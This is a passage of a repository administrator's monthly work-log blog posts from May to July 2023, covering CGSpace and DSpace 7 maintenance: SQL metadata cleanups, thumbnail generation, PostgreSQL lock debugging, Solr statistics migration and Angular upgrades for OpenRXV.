- We are at the stage of voting on definitions
## 2023-05-19
- I ported a few of the minor ImageMagick Thumbnail Filter improvements to our `6_x-prod` branch
## 2023-05-20
- I deployed the latest thumbnail changes on CGSpace, ran all updates, and rebooted it
- I exported CGSpace to check for missing Initiative mappings
- Then I started a harvest on AReS
## 2023-05-23
- Help Francesca with an import of a journal article with a few hundred authors
- I used the DSpace 7 live import from PubMed
- I also noticed a bug in the CrossRef live import if you change the DOI field, so I [filed an issue](https://github.com/DSpace/DSpace/issues/8865)
## 2023-05-25
- Meeting on output types
- Make a [pull request on DSpace to capture publisher during live import from Crossref](https://github.com/DSpace/DSpace/pull/8866)
## 2023-05-26
- Make a [pull request on DSpace to update checkstyle](https://github.com/DSpace/DSpace/pull/8868)
- Make a [pull request on DSpace-angular to fix an incorrect i18n UI string](https://github.com/DSpace/dspace-angular/pull/2274)
- I'm experimenting with replacing old thumbnails
- In the past we used to upload thumbnails for journal covers, but those were low quality and look horrible now
- Using the provenance field I want to identify items with 1 bitstream of type gif or jpg, then extract the item IDs along with DOIs:
```sql
\COPY (SELECT
text_value,
dspace_object_id
FROM
metadatavalue
WHERE
dspace_object_id IN (
SELECT
dspace_object_id
FROM
metadatavalue
WHERE
metadata_field_id = 28
AND place = 0
AND (text_value LIKE '%No. of bitstreams: 1%'
AND text_value SIMILAR TO '%.(gif|jpg|jpeg)%'))
AND metadata_field_id = 220) TO /tmp/items-with-old-bitstreams.csv WITH CSV HEADER;
```
- I extract the DOIs and look them up on CrossRef to see which are CC-BY, then extract those:
```console
$ csvcut -c text_value /tmp/items-with-old-bitstreams.csv | sed 1d > /tmp/dois.txt
$ ./ilri/crossref_doi_lookup.py -i /tmp/dois.txt -e fuuu@example.com -o /tmp/dois-resolved.csv
$ csvgrep -c license -m 'creativecommons' /tmp/dois-resolved.csv \
| csvgrep -c license -m 'by-nc-nd' --invert-match \
| csvcut -c doi \
| sed '2,$s_^\(.*\)$_https://doi.org/\1_' \
| sed 1d > /tmp/dois-for-cc-items-with-old-bitstreams.txt
```
- This results in 262 items that have DOIs that are CC-BY (but not ND)
- This is a good starting point, but misses some that had low-quality thumbnails uploaded after they were added (ie, there's no record of a bitstream in the provenance field)
- I ran the list through my Sci-Hub download script and filtered out a few that downloaded invalid PDFs (manually), then generated thumbnails for all of them:
```console
$ ~/src/git/DSpace/ilri/get_scihub_pdfs.py -i /tmp/dois-for-cc-items-with-old-bitstreams.txt -o bitstreams.csv
$ chrt -b 0 vipsthumbnail *.pdf --export-profile srgb -s 600x600 -o './%s.pdf.jpg[Q=02,optimize_coding,strip]'
```
- Then I joined the CSVs on the DOI column, filtered out any that we didn't find PDFs for, and formatted the resulting CSV with an id, filename, and bundle column:
```console
$ csvjoin -c doi bitstreams.csv /tmp/items-with-old-bitstreams.csv \
| csvgrep -c filename --invert-match -r '^$' \
| sed '1s/dspace_object_id/id/' \
| csvcut -c id,filename \
| sed -e '1s/^\(.*\)$/\1,bundle/' -e '2,$s/^\(.*\)$/\1.jpg__description:libvips thumbnail,THUMBNAIL/' > new-thumbnails.csv
```
- I did a dry run with `ilri/post_bitstreams.py` and it seems that most (all?) already have thumbnails from the last time I did a massive Sci-Hub check
- So relying on the provenance field is not very reliable it seems, and that was a waste of two hours...
- I did discover, while originally posting WebP thumbnails, that the format doesn't seem to be set correctly when uploading WebP via the REST API (it gets set to Unknown), though it does work when uploading via XMLUI
- POSTing a JPG to the THUMBNAIL bundle sets the format to JPEG...
- I am guessing that is a bug that I won't bother troubleshooting since the DSpace 6.x REST API is deprecated
## 2023-05-27
- Export CGSpace to check for missing Initiative collection mappings
- Then I also ran the csv-metadata-quality tool on the Initiatives to do some easy fixes like country/region mapping and whitespace fixes
- Start a harvest on AReS
## 2023-05-29
- Re-create my local PostgreSQL 14 container:
```console
$ podman rm dspacedb14
$ podman pull docker.io/postgres:14-alpine
$ podman run --name dspacedb14 -v dspacedb14_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d docker.io/postgres:14-alpine -c shared_buffers=1024MB -c random_page_cost=1.1
```
- Export CGSpace again to do some major cleanups in OpenRefine
- I found a few countries that are in the ISO 3166-1 and UN M.49 lists, but not in ours so I added them to the list in `input-forms.xml` and regenerated the controlled vocabularies for the CGSpace Submission Guidelines
- There were a handful of issues with ISSNs, ISBNs, DOIs, access status, licenses, and missing CGIAR Trust Fund donors for Initiatives outputs
- This was about 455 items
- Helping the Alliance web team understand the DSpace REST API for determining which collection an item belongs to
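- Roughly, the DSpace 6 REST API can expand the parent collection on the item endpoint (the UUID here is made up):
```console
$ curl -s 'https://cgspace.cgiar.org/rest/items/2547402f-98f4-4a39-a0b9-cba0deadbeef?expand=parentCollection' \
  | jq '.parentCollection | {uuid, name, handle}'
```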
<!-- vim: set sw=2 ts=2: -->

content/posts/2023-06.md
---
title: "June, 2023"
date: 2023-06-02T10:29:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-06-02
- Spend some time testing my `post_bitstreams.py` script to update thumbnails for items on CGSpace
- Interestingly I found an item with a JFIF thumbnail and another with a WebP thumbnail...
- Meeting with Valentina, Stefano, and Sara about MODS metadata in CGSpace
- They have experience with improving the MODS interface in MELSpace's OAI-PMH for use with AGRIS and were curious if we could do the same in CGSpace
- From what I can see we need to upgrade the MODS schema from 3.1 to 3.7 and then just add a bunch of our fields to the crosswalk
<!--more-->
## 2023-06-04
- Upgrade CGSpace to Ubuntu 22.04
- The upgrade was mostly normal, but I had to unhold the openjdk package in order for `do-release-upgrade` to run:
```console
# apt-mark unhold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
```
- In [2022-11]({{< relref "2022-11.md" >}}) an upstream Java update broke the DSpace 6 Handle server so we will have to pin this again after the upgrade to Ubuntu 22.04
- After the upgrade I made sure CGSpace was working, then proceeded to upgrade PostgreSQL from 12 to 14, like I did on [DSpace Test in 2023-03]({{< relref "2023-03.md" >}})
- Then I had to downgrade OpenJDK to fix the Handle server using the ones I had previously downloaded for Ubuntu 20.04 because they no longer exist on Launchpad:
```console
# dpkg -i openjdk-8-j*8u342-b07*.deb
```
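- And the packages presumably need to be re-held afterwards so a routine `apt upgrade` doesn't replace them again:
```console
# apt-mark hold openjdk-8-jdk-headless:amd64 openjdk-8-jre-headless:amd64
```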
- Export CGSpace to fix missing Initiative collection mappings
- Start a harvest on AReS
- Work on the DSpace 7 migration a bit more
- I decided to rebase and drop all the submission form edits because they conflict every time upstream changes!
## 2023-06-06
- Fix some incorrect ORCID identifiers for an Alliance author on CGSpace
- Export our list of ORCID identifiers, resolve them, and update the records in CGSpace:
```console
$ cat dspace/config/controlled-vocabularies/cg-creator-identifier.xml 2022-09-22-add-orcids.csv | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u > /tmp/2023-06-06-orcids.txt
$ ./ilri/resolve_orcids.py -i /tmp/2023-06-06-orcids.txt -o /tmp/2023-06-06-orcids-names.txt -d
$ ./ilri/update_orcids.py -i /tmp/2023-06-06-orcids-names.txt -db dspacetest -u dspace -p 'ffff' -m 247
```
- Start working on updating the MODS schema in CGSpace from 3.1 to 3.8 based on Stefano and Salem's work last year
## 2023-06-08
- Continue working on the MODS schema mapping
- Export CGSpace to check and update `dcterms.extent` fields
- I normalized about 1,500 to use either "p. 1-6" or "5 p." format
- Also, I used this GREL expression to extract missing pages from the citation field: `cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*(pp?\.\s?\d+[-]\d+).*/)[0]`
- This was over 4,000 items with a format like "p. 1-6" and "pp. 1-6" in the citation
- I used another GREL expression to extract another 5,000: `cells['dcterms.bibliographicCitation[en_US]'].value.match(/.*?(\d+\s+?[Pp]+\.).*/)[0]`
- This was for the format like "1 p." (note we had to protect against the greedy `.*` in the beginning)
- I also did some work to capture a handful of missing DOIs and ISSNs, but it was only about 100 items and I will have to wait until the 10,000+ above finish importing
## 2023-06-09
- I see there are ~200 users in CGSpace that have registered with their CGIAR email address using a password as opposed to using Active Directory:
```sql
SELECT * FROM eperson WHERE email LIKE '%cgiar.org' AND netid IS NOT NULL AND password IS NOT NULL;
```
- I am wondering if I should delete their passwords and tell them to log in using LDAP
- As an initial test I will reset a few accounts including my own that have passwords and salts:
```sql
UPDATE eperson SET password=DEFAULT,salt=DEFAULT,digest_algorithm=DEFAULT WHERE netid IN ('axxxx', 'axxxx', 'bxxxx');
```
- I also decided to reset passwords/salts for CGIAR accounts that have not been active since 2021 (1.5 years ago):
```sql
UPDATE eperson SET password=DEFAULT,salt=DEFAULT,digest_algorithm=DEFAULT WHERE email LIKE '%cgiar.org' AND netid IS NOT NULL AND password IS NOT NULL AND salt IS NOT NULL AND last_active < '2022-01-01'::date;
```
- This was about 100 accounts...
- I will wait some more time before I decide what to do about the more current ones
- Add a few more ORCID identifiers to my list and tag them on CGSpace
## 2023-06-10
- Export CGSpace to check for missing Initiative mappings
- Start a harvest on AReS
## 2023-06-11
- File [an issue](https://github.com/DSpace/DSpace/issues/8900) on DSpace for the `Content-Disposition` bug causing images to get downloaded instead of opened inline
## 2023-06-12
- Export CGSpace to do some more work extracting volume and issue from citations for items where they are missing
- I found and fixed over 7,000!
- Then I found and extracted another 7,000 items with no extents (pages)
- Then I replaced all occurrences of en dashes in page ranges with regular hyphens
## 2023-06-13
- Last night I finally figured out how to do basic overrides to the simple item view in Angular
- Add a handful of new ORCID identifiers to my list and tag them on CGSpace
- Extract a list of all the proposed actions for CG Core output types and create a [new issue for them on CG Core's GitHub repository](https://github.com/AgriculturalSemantics/cg-core/issues/45)
- Extract a list of all the proposed actions for CG Core output types for MARLO and create [a new issue for them on MARLO's GitHub repository](https://github.com/CCAFS/MARLO/issues/2479)
- Meeting with Indira, Ryan, and Abenet to discuss plans for the DSpace 7 focus group
## 2023-06-14
- Did some more work on the DSpace 7 Test to improve the submission forms and the look and feel
- Extract a list of all the proposed actions for CG Core output types for MEL and create [a new issue for them on MEL's GitHub repository](https://github.com/CodeObia/MEL/issues/11216)
- I filed [an issue about the yarn merge-i18n script](https://github.com/DSpace/dspace-angular/issues/2309)
- I made [a pull request for some Finnish language i18n strings](https://github.com/DSpace/dspace-angular/pull/2306)
- I made [a pull request to lint the i18n en.json5 file](https://github.com/DSpace/dspace-angular/pull/2306)
## 2023-06-15
- A lot more work on DSpace 7
- I tested some pull requests and worked on the style of the item view and homepage
## 2023-06-16
- A lot more work on DSpace 7
- I made [a pull request to adjust font weight in item counts ](https://github.com/DSpace/dspace-angular/pull/2316)
- I made [a pull request to update the ESLint configuration for JSON5](https://github.com/DSpace/dspace-angular/pull/2317)
## 2023-06-17
- Export CGSpace to check for missing Initiative collection mappings
- I also spent some time doing sanity checks on countries, regions, DOIs, and more
- I lowercased all our AGROVOC keywords in `dcterms.subject`:
```sql
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 2392
dspace=*# COMMIT;
COMMIT
```
- Start a harvest on AReS
## 2023-06-19
- Today I started getting an error on DSpace 7 Test
- The page loads, and then when it is almost done it goes blank to white with this in the console:
```console
ERROR DOMException: CSSStyleSheet.cssRules getter: Not allowed to access cross-origin stylesheet
```
- I restarted Angular, but it didn't fix it
- The `yarn test:rest` script shows everything OK, and I haven't changed anything recently...
- I re-compiled the Angular UI using the default theme and it was the same...
- I tried in Firefox Nightly and it works...
- So it must be something related to the browser
- I tried clearing all the session storage / cookies and refreshing and it worked
- I switched back to the CGSpace theme and it happened again
- I had a hunch it might be due to the GDPR cookie plugin in my browser, so I disabled that and then refreshed and it worked... hmmm
- Upload thumbnails for about 42 IITA Journal Articles after resolving their DOIs and making sure they were not CC ND
- I fixed a few bugs in `get_scihub_pdfs.py` in the process
## 2023-06-21
- Stefano got back to me about the MODS OAI-PMH schema test on DSpace Test
- He said that it's fine if we use iso8601 encoding for dates instead of w3cdtf and asked if we can create a custom end point for AGRIS that only includes types like Journal Articles similar to how Salem did it: https://melspace.loc.codeobia.com/oai/agris?verb=ListRecords&metadataPrefix=mods
- I updated DSpace Test with the new date format and said I'd work on the custom AGRIS set
## 2023-06-25
- Export CGSpace to check for missing Initiative collection mappings
- I wanted to start a harvest on AReS, but the load on the server has been high for a few days and I'm not sure what is causing it
- I decided to run all updates and reboot it since it's Sunday anyway
## 2023-06-26
- Since the new DSpace 7 will respect newlines in metadata fields I am curious to see how many of our abstracts have poor newlines
- I exported CGSpace and used a custom text facet with this GREL expression in OpenRefine to count the number of newlines in each cell:
```console
value.split('\n').length()
```
- Also useful to check for general length of the text in the cell to make sure it's a reasonably long string
- I spent some time trying to find a pattern that I could use to identify "easy" targets, but there are so many exceptions that it will have to be done manually
- I fixed a few dozen
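- For the length check, something like this in a custom numeric facet should do (untested here, but it's standard GREL):
```console
value.length()
```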
- Do a bit of work on thumbnails on CGSpace
- I'm trying to troubleshoot the Discovery error I get on DSpace 7:
```console
java.lang.NullPointerException: Cannot invoke "org.dspace.discovery.configuration.DiscoverySearchFilterFacet.getIndexFieldName()" because the return value of "org.dspace.content.authority.DSpaceControlledVocabularyIndex.getFacetConfig()" is null
```
- I reverted to the default `submission-forms.xml` and the `getFacetConfig()` error goes away...
- Kill some long-held locks on CGSpace PostgreSQL, as some users are complaining of slowness in archiving
- I did some testing of the LDAP login issue related to groupmaps
- It does seem to be a regression from the [LDAP auth patch](https://github.com/DSpace/DSpace/pull/8814) from last month, so I [filed an issue](https://github.com/DSpace/DSpace/issues/8920)
- I spent some time on working on Angular and I figured out how to add a custom Angular component to show the UN SDG Goal icons on DSpace 7
## 2023-06-27
- I debugged the NullPointerException and somehow it disappeared
- It seems to be related to the external controlled vocabularies in the submission form
- I removed them all, then added them all back, and now the issue is solved... hmmmm
- Oh no, now they are gone again, sigh...
## 2023-06-28
- Spent a lot of time debugging the browse indexes
- Looking at the [DSpace 7 demo API](https://api7.dspace.org/server/api/discover/browses) I see the four default browse indexes from `dspace.cfg` and the one default `srsc` one that gets automatically enabled from the `<vocabulary>srsc</vocabulary>` in the `submission-forms.xml`
- The same API call on my test DSpace 7 configuration results in the HTTP 500 I've been seeing for some time, and I am pretty sure it's due to the automagic configuration of hierarchical browses based on the submission form
- Yes, if I remove them all from my submission form then this works: http://localhost:8080/server/api/discover/browses
- I went through each of our vocabularies and tested them one by one:
- dcterms-subject: OK
- dc-contributor-author: NO
- cg-creator-identifier: NO
- cg-contributor-affiliation: OK (and with `facetType: "affiliation"` in API response?!)
- cg-contributor-donor: OK (`facetType: "sponsorship"`)
- cg-journal: NO
- cg-coverage-subregion: NO
- cg-species-breed: NO
- Now I need to figure out what it is about those five that causes them to not work!
- Ah, after debugging with someone on the DSpace Slack, I realized that DSpace expects these vocabularies to have corresponding indexes configured in `discovery.xml`, and they must be added as search filters AND sidebar facets.
## 2023-06-29
- I noticed there is now a [patched version of the Handle JAR for DSpace 6.x](https://github.com/DSpace/DSpace/issues/8557#issuecomment-1595340249)
- This fixes the [issue in OpenJDK 1.8.0_352](https://groups.google.com/g/dspace-tech/c/PqjfA5mqG4w/m/FhxI5oXhFwAJ?pli=1), so we can remove the apt pin on JDK now
- I deployed it on CGSpace and it's working!
- I lowercased all our AGROVOC terms because I noticed a few that were not:
```console
dspace=# BEGIN;
BEGIN
dspace=*# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE dspace_object_id IN (SELECT uuid FROM item) AND metadata_field_id=187 AND text_value ~ '[[:upper:]]';
UPDATE 53
dspace=*# COMMIT;
```
- After more discussion about the NullPointerException related to browse options, I filed [an issue](https://github.com/DSpace/DSpace/issues/8927)
## 2023-06-30
- I added another custom component to display CGIAR Impact Area icons in the DSpace 7 test
<!-- vim: set sw=2 ts=2: -->

content/posts/2023-07.md
---
title: "July, 2023"
date: 2023-07-01T17:14:36+03:00
author: "Alan Orth"
categories: ["Notes"]
---
## 2023-07-01
- Export CGSpace to check for missing Initiative collection mappings
- Start harvesting on AReS
## 2023-07-02
- Minor edits to the `crossref_doi_lookup.py` script while running some checks from 22,000 CGSpace DOIs
## 2023-07-03
- I analyzed the licenses declared by Crossref and found with high confidence that ~400 of ours were incorrect
- I took the more accurate ones from Crossref and updated the items on CGSpace
- I took a few hundred ISBNs as well for where we were missing them
- I also tagged ~4,700 items with missing licenses as "Copyrighted; all rights reserved" based on their Crossref license status being TDM, mostly from Elsevier, Wiley, and Springer
- Checking a dozen or so manually, I confirmed that if Crossref only has a TDM license then it's usually copyrighted (could still be open access, but we can't tell via Crossref)
- I would be curious to write a script to check the Unpaywall API for open access status...
- In the past I found that their *license* status was not very accurate, but the open access status might be more reliable
- More minor work on the DSpace 7 item views
- I learned some new Angular template syntax
- I created a custom component to show Creative Commons licenses on the simple item page
- I also decided that I don't like the Impact Area icons as a component because they don't have any visual meaning
## 2023-07-04
- Focus group meeting with CGSpace partners about DSpace 7
- I added a themed file selection component to the CGSpace theme
- It displays the bitstream description instead of the file name, just like we did in DSpace 6 XMLUI
- I added a custom component to show share icons
## 2023-07-05
- I spent some time trying to update OpenRXV from Angular 9 to 10 to 11 to 12 to 13
- Most things work but there are some minor bugs it seems
- Mishell from CIP emailed me to say she was having problems approving an item on CGSpace
- Looking at PostgreSQL I saw there were a dozen or so locks that were several hours and even over one day old so I killed those processes and told her to try again
## 2023-07-06
- Types meeting
- I wrote a Python script to check Unpaywall for some information about DOIs
## 2023-07-07
- Continue exploring Unpaywall data for some of our DOIs
- In the past I've found their _licensing_ information to not be very reliable (preferring Crossref), but I think their _open access status_ is more reliable, especially when the provider is listed as being the publisher
- Even so, sometimes the version can be "acceptedVersion", which is presumably the author's version, as opposed to the "publishedVersion", which means it's available as open access on the publisher's website
- I did some quality assurance and found ~100 that were marked as Limited Access, but should have been Open Access, and fixed a handful of licenses
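- The heart of the check is one Unpaywall API call per DOI (the DOI below is made up; my script just does this in bulk and writes a CSV):
```console
$ curl -s "https://api.unpaywall.org/v2/10.1234/example-doi?email=fuuu@example.com" \
  | jq '{is_oa, oa_status, version: .best_oa_location.version, host: .best_oa_location.host_type}'
```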
- Delete duplicate metadata as described in my DSpace issue from last year: https://github.com/DSpace/DSpace/issues/8253
- Start working on some statistics on AGROVOC usage for my presentation next week
- I used the following SQL query to dump values from all subject fields and lower case them:
```console
localhost/dspacetest= ☘ \COPY (SELECT DISTINCT(lower(text_value)) AS "subject" FROM metadatavalue WHERE dspace_object_id in (SELECT dspace_object_id FROM item) AND metadata_field_id IN (187, 120, 210, 122, 215, 127, 208, 124, 128, 123, 125, 135, 203, 236, 238, 119)) to /tmp/2023-07-07-cgspace-subjects.csv WITH CSV HEADER;
COPY 26443
Time: 2564.851 ms (00:02.565)
```
- Then I extracted the subjects and looked them up against AGROVOC:
```console
$ csvcut -c subject /tmp/2023-07-07-cgspace-subjects.csv | sed '1d' > /tmp/2023-07-07-cgspace-subjects.txt
$ ./ilri/agrovoc_lookup.py -i /tmp/2023-07-07-cgspace-subjects.txt -o /tmp/2023-07-07-cgspace-subjects-results.csv
```
- I did some more tests with Angular 13 on OpenRXV and found out why the repository type dropdown wasn't working
- It was because of a missing 1-line JSON file in the data directory, which is runtime data, not code
- I copied the data directory from the production server and rebuilt, and the site is working well now
- I did a full harvest with plugins and it worked!
- So it seems Angular 13.4.0 will work, yay
## 2023-07-08
- Export CGSpace to check for missing Initiative collection mappings
- Start a harvest on AReS
- The AGROVOC lookup finished, so I checked the number of matches:
```console
$ csvgrep -c 'match type' -r '^.+$' ~/Downloads/2023-07-07-cgspace-subjects-resolved.csv | sed 1d | wc -l
12528
```
- So that's 12,528 out of 26,443 unique terms (47.3%)
- I did a LOT of work on the OpenRXV frontend build dependencies to bring them more in line with Angular 13
## 2023-07-10
- I did a lot more work on OpenRXV to test and update dependencies
- I deployed the latest version on the production server
## 2023-07-12
- CGSpace upgrade meeting with Americas and Africa group
## 2023-07-13
- Michael Victor asked me to help Aditi extract some information from CGSpace
- She was interested in journal articles published between 2018 and 2023 with a range of subjects related to drought, flooding, resilience, etc
- I used an advanced query with some AGROVOC terms:
```console
dcterms.issued:[2018 TO 2023] AND dcterms.type:"Journal Article" AND (dcterms.subject:flooding OR dcterms.subject:flood OR dcterms.subject:"extreme weather events" OR dcterms.subject:drought OR dcterms.subject:"drought resistance" OR dcterms.subject:"drought tolerance" OR dcterms.subject:"soil salinity" OR dcterms.subject:"pests of plants" OR dcterms.subject:pests OR dcterms.subject:heat OR dcterms.subject:fertilizers OR dcterms.subject:"fertilizer technology" OR dcterms.subject:"rice fields" OR dcterms.subject:"landscape conservation" OR dcterms.subject:"landscape restoration" OR dcterms.subject:livestock)
```
- Interestingly, some variations of this same exact query produce no search results, and I see this error in the DSpace log:
```console
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dcterms.issued:[2018 TO 2023] AND dcterms.type:"Journal Article" AND (dcterms.subject:flooding OR dcterms.subject:flood OR dcterms.subject:"extreme weather events" OR dcterms.subject:drought OR dcterms.subject:"drought resistance" OR dcterms.subject:"drought tolerance" OR dcterms.subject:"soil salinity" OR dcterms.subject:"pests of plants" OR dcterms.subject:pests OR dcterms.subject:heat OR dcterms.subject:fertilizers OR dcterms.subject:"fertilizer technology" OR dcterms.subject:"rice fields" OR dcterms.subject:livestock OR dcterms.subject:"landscape conservation" OR dcterms.subject:"landscape restoration\"\)': Lexical error at line 1, column 617. Encountered: <EOF> after : "\"landscape restoration\\\"\\)"
```
- It seems to be when there is a quoted search term at the end of the parenthesized group
- For what it's worth this same query worked fine on DSpace 7.6
## 2023-07-15
- Export CGSpace to fix missing Initiative collection mappings
- Start a harvest on AReS
## 2023-07-17
- Rasika had sent me a list of new ORCID identifiers for new IWMI staff so I combined them with our existing list and ran `resolve_orcids.py` to refresh the names in our database
- I updated the list, updated names in the database, and tagged new authors with missing identifiers in existing items
## 2023-07-18
- Meeting with IWMI, IRRI, and IITA colleagues about CGSpace upgrade plans
- Maria from the Alliance mentioned having some submissions stuck on CGSpace
- I looked and found a number of locks stuck for nineteen, eighteen, or more hours...
- I killed them and told her to try again
```console
$ psql < locks-age.sql | less -S
$ psql < locks-age.sql | grep -E " (19|18|17|16|12):" | awk -F"|" '{print $10}' | sort -u | xargs kill
```
## 2023-07-19
- I had to kill a bunch more locked processes in PostgreSQL, I'm not sure what's going on
- After some discussion about an advanced search bug with Tim on Slack, I filed [an issue on GitHub](https://github.com/DSpace/DSpace/issues/8962)
## 2023-07-20
- I added a new metadata field for CGIAR Impact Platforms (`cg.subject.impactPlatform`) to CGSpace
## 2023-07-22
- Export CGSpace to fix missing Initiative collections
- Start a harvest on AReS
## 2023-07-24
- Test Salem's new JavaScript-based DSpace Statistics API and send him some feedback
- I noticed a few times that the Solr service on my DSpace 7 instance is getting OOM killed
- I had been using a 4g Solr heap, but maybe we don't need that much
- Tomcat is also using 4.6GB, and then there's PostgreSQL... so perhaps it's all a bit much on this system now
## 2023-07-25
- Start testing exporting DSpace 6 Solr cores to import on DSpace 7:
```console
$ chrt -b 0 dspace solr-export-statistics -i statistics
```
- I'm curious how long it takes and how much data there will be
- The size of the Solr data directory is currently 82GB
- The export took about 2.5 hours and created 6,000 individual CSVs, one for each day of Solr stats
- The size of the exported CSVs is about 88GB
- I will copy just a few years to import on the DSpace 7 test server
- So importing these is going to require removing the Atmire custom fields:
```console
$ dspace solr-import-statistics -i statistics
Exception: Error from server at http://localhost:8983/solr/statistics: ERROR: [doc=1a92472e-e39d-4602-9b4d-da022df8f233] unknown field 'containerCommunity'
org.apache.solr.client.solrj.impl.HttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/statistics: ERROR: [doc=1a92472e-e39d-4602-9b4d-da022df8f233] unknown field 'containerCommunity'
at org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:681)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:266)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:248)
at org.apache.solr.client.solrj.SolrClient.request(SolrClient.java:1290)
at org.dspace.util.SolrImportExport.importIndex(SolrImportExport.java:465)
at org.dspace.util.SolrImportExport.main(SolrImportExport.java:148)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:77)
at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.base/java.lang.reflect.Method.invoke(Method.java:568)
at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:277)
at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:133)
at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:98)
```
- I will try using solr-import-export-json, which I've used in the past to skip Atmire custom fields in Solr:
```console
$ chrt -b 0 ./run.sh -s http://localhost:8081/solr/statistics -a export -o /tmp/statistics-2022.json -f 'time:[2022-01-01T00\:00\:00Z TO 2022-12-31T23\:59\:59Z]' -k uid -S author_mtdt,author_mtdt_search,iso_mtdt_search,iso_mtdt,subject_mtdt,subject_mtdt_search,containerCollection,containerCommunity,containerItem,countryCode_ngram,countryCode_search,cua_version,dateYear,dateYearMonth,geoipcountrycode,geoIpCountryCode,ip_ngram,ip_search,isArchived,isInternal,isWithdrawn,containerBitstream,file_id,referrer_ngram,referrer_search,userAgent_ngram,userAgent_search,version_id,complete_query,complete_query_search,filterquery,ngram_query_search,ngram_simplequery_search,simple_query,simple_query_search,range,rangeDescription,rangeDescription_ngram,rangeDescription_search,range_ngram,range_search,actingGroupId,actorMemberGroupId,bitstreamCount,solr_update_time_stamp,bitstreamId,core_update_run_nb
```
- Some users complained that CGSpace was slow and I found a handful of locks that were hours and days old...
- I killed those and told them to try again
- After importing the Solr statistics into DSpace 7 I realized that my DSpace Statistics API will work fine
- I made some minor modifications to the Ansible infrastructure scripts to make sure it is enabled and then activated it on DSpace 7 Test
## 2023-07-26
- Debugging lock issues on CGSpace
- I see the blocking PIDs for some long-held locks are "idle in transaction":
```console
$ ps auxw | grep -E "(1864132|1659487)"
postgres 1659487 0.0 0.5 3269900 197120 ? Ss Jul25 0:03 postgres: 14/main: cgspace cgspace 127.0.0.1(61648) idle in transaction
postgres 1864132 0.1 0.7 3275704 254528 ? Ss 07:27 0:08 postgres: 14/main: cgspace cgspace 127.0.0.1(36998) idle in transaction
postgres 1880388 0.0 0.0 9208 2432 pts/3 S+ 08:48 0:00 grep -E (1864132|1659487)
```
- I used some other scripts and found that those processes were executing the following statement:
```console
select nextval ('public.tasklistitem_seq')
```
- I don't know why these can get blocked for hours without resolution, but for now I just killed them
- For what it's worth [these sequences were removed in DSpace 7.0](https://github.com/DSpace/DSpace/commit/16ae96b4c3d833c2a4acd1f05985d424c3a52bd7) along with the "traditional" item workflow—maybe that means we won't have such contention issues in DSpace 7!
- I wrote a slightly longer regex to match locks that have been stuck for more than 1 hour based on the output of the `locks-age.sql` script and killed them:
```console
$ psql < locks-age.sql | awk -F"|" '/ [[:digit:]][1-9]:[[:digit:]]{2}:[[:digit:]]{2}\./ {print $10}' | sort -u | xargs kill
```
- I filed [an issue for missing Altmetric badges on DSpace 7 Angular](https://github.com/DSpace/dspace-angular/issues/2400)
## 2023-07-27
- Export CGSpace to check countries, regions, types, and Initiatives
- There were a few minor issues in countries and regions, and I noticed 186 items without types!
- Then I ran the file through csv-metadata-quality to make sure items with countries have appropriate regions
- Brief discussion about OpenRXV bugs and fixes with Moayad
- I was toying with the idea of using an expanded whitespace check/fix based on [ESLint's no-irregular-whitespace](https://eslint.org/docs/latest/rules/no-irregular-whitespace) rule in csv-metadata-quality
- I found 176 items in CGSpace with such whitespace in their titles alone
- I compared the results of removing these characters and replacing them with a space
- In _most_ cases removing it is the correct thing to do, for example "Pesticides : une arme à double tranchant" → "Pesticides: une arme à double tranchant"
- But in some items it is tricky, for example "L'environnement juridique est-il propice à la gestion" → "L'environnement juridique est-il propice àla gestion"
- I guess it would really need some good heuristics or a human to verify...
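- A quick way to gauge the scale is to grep the title column of an export for a few of the characters from that ESLint rule (sketch only; the export filename is made up and this assumes a UTF-8 locale):
```console
$ csvcut -c 'dc.title[en_US]' /tmp/cgspace-export.csv | grep -c $'[\u00a0\u2009\u200a\u200b\u202f]'
```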
- I upgraded OpenRXV to Angular v14
## 2023-07-28
- After a bit more testing I merged the [Angular v14 changes to OpenRXV master](https://github.com/ilri/OpenRXV/pull/184)
- I am getting an error trying to import the 2020 Solr statistics from CGSpace to DSpace 7:
```console
Exception in thread "main" org.apache.solr.client.solrj.impl.BaseHttpSolrClient$RemoteSolrException: Error from server at http://localhost:8983/solr/statistics: ERROR: [doc=0008a7c1-e552-4a4e-93e4-4d23bf39964b] Error adding field 'workflowItemId'='0812be47-1bfe-45e2-9208-5bf10ee46f81' msg=For input string: "0812be47-1bfe-45e2-9208-5bf10ee46f81"
at org.apache.solr.client.solrj.impl.HttpSolrClient.executeMethod(HttpSolrClient.java:745)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:259)
at org.apache.solr.client.solrj.impl.HttpSolrClient.request(HttpSolrClient.java:240)
at org.apache.solr.client.solrj.SolrRequest.process(SolrRequest.java:234)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:102)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:69)
at org.apache.solr.client.solrj.SolrClient.add(SolrClient.java:82)
at it.damore.solr.importexport.App.insertBatch(App.java:295)
at it.damore.solr.importexport.App.lambda$writeAllDocuments$10(App.java:276)
